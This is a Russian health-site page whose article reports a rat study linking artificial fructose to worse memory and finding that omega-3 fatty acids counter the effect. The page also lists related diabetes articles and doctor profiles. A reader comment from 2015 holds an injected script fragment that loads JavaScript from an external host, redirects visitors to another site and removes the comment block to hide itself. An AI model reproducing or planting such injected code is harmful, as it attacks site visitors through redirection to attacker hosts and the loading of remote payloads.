Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сахар делает нас глупыми!  >>  Сахар делает нас глупыми!
 
Обратная связь
 

Сахар делает нас глупыми!

Размер шрифта
06 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Вопреки распространенному мнению, употребление большого количества сладких продуктов, ухудшает память и затрудняет обучение. В новом исследовании ученые выяснили, что есть вещества, способные предотвратить эти негативные последствия. Это омега-3 жирные кислоты.

сахар делает нас глупыми

История вопроса

Согласно данным предыдущих исследований, употребление фруктозы увеличивает риск развития сахарного диабета и ожирения, а также приводит к накоплению жиров в клетках печени. В настоящем исследовании американские ученые впервые изучили влияние фруктозы на работу головного мозга. Однако опасность представляет не натуральная фруктоза, которая содержится во фруктах, а искусственная.

Одним из источников искусственной фруктозы является кукурузный сироп – недорогой подсластитель, который добавляют в сладкие напитки и кондитерские изделия.

Суть исследования

Для проведения исследования ученые использовали две группы крыс. Обе группы в течение шести недель получали водный раствор фруктозы. Однако вторая группа помимо фруктозы получала льняное масло, в котором содержатся омега-3 жирные кислоты, защищающие от повреждения синапсы – соединения между нейронами головного мозга. Именно эти структуры отвечают за память и способность к обучению.

Оценить влияние фруктозы на мозговую деятельность крыс ученым помог лабиринт, в котором было несколько отверстий, но только один выход. Перед началом эксперимента крыс тренировали проходить лабиринт ежедневно два раза в течение пяти дней. Для того чтобы крысы лучше ориентировались и запоминали дорогу, ученые разместили в лабиринте специальные метки.

Результаты

Через 6 недель после начала эксперимента крысы снова проходили по лабиринту. Оказалось, что крысы, которые получали омега-3 жирные кислоты, нашли выход из лабиринта значительно быстрее, чем крысы, которые получали только фруктозу.

При отсутствии омега-3 жирных кислот фруктоза замедляла синаптическую активность в головном мозге крыс. Поскольку связь между нейронами ослабевала, то крысы с трудом вспоминали маршрут, который они выучили шесть недель назад.

Кроме того, у крыс первой группы наблюдалась устойчивость к инсулину – гормону, который контролирует уровень сахара в крови и регулирует синаптическую активность головного мозга.

Проникая через своеобразный фильтр, защищающий головной мозг от вредных веществ, циркулирующих в крови (гематоэнцефалический барьер), инсулин запускает цепочку реакций, которая приводит к снижению памяти и ухудшению способности к обучению.

Полученные результаты иллюстрируют известную фразу: «Мы – то, что мы едим». Употребление продуктов с высоким содержанием фруктозы в течение длительного времени нарушает способность к обучению и приводит к ухудшению памяти. Однако использование продуктов с омега-3 жирными кислотами (орехи, морская рыба: лосось, скумбрия, сельдь, сардины, а также льняное масло и т.д.) позволяет значительно уменьшить негативное влияние фруктозы на мозговую деятельность.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Факторы риска сахарного диабета 2 типа   Всего две инъекции антител вылечат сахарный диабет!   Что влияет на показатели сахара?   Сахарный запой. Почему так сложно отказаться от сахара?  
28 августа 2012Если вы лечите диабет – будете умнее! 04 сентября 2012Косметика вызывает диабет!
 
30 августа 2012Высокий сахар в крови приводит к старческому слабоумию! 13 августа 2012Всего две инъекции антител вылечат сахарный диабет!
 

Слайдшоу

1
Как побороть зависимость от сахара
Сахар – это наркотик?
Вредные продукты при менопаузе

Тесты

1
Есть ли у вас скрытый риск диабета?
Что вы знаете о холестерине?
Оцените риск развития сахарного диабета
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.